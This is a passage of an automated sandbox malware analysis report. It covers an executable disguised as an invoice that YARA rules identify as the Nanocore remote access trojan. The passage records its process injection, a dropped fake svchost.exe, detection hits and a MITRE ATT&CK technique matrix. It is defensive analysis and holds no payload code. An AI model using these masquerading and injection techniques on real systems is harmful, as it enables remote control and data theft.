        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeQueries volume information: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe VolumeInformation
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeQueries volume information: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe VolumeInformation
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents
        Source: C:\Windows\explorer.exeDirectory queried: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: svchost.exe, 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: svchost.exe, 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture1File and Directory Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsService Execution2Registry Run Keys / Startup Folder1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Windows Service1Software Packing1NTDSSecurity Software Discovery221Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptProcess Injection312Timestomp1LSA SecretsVirtualization/Sandbox Evasion15SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1Masquerading11Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol12Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion15DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
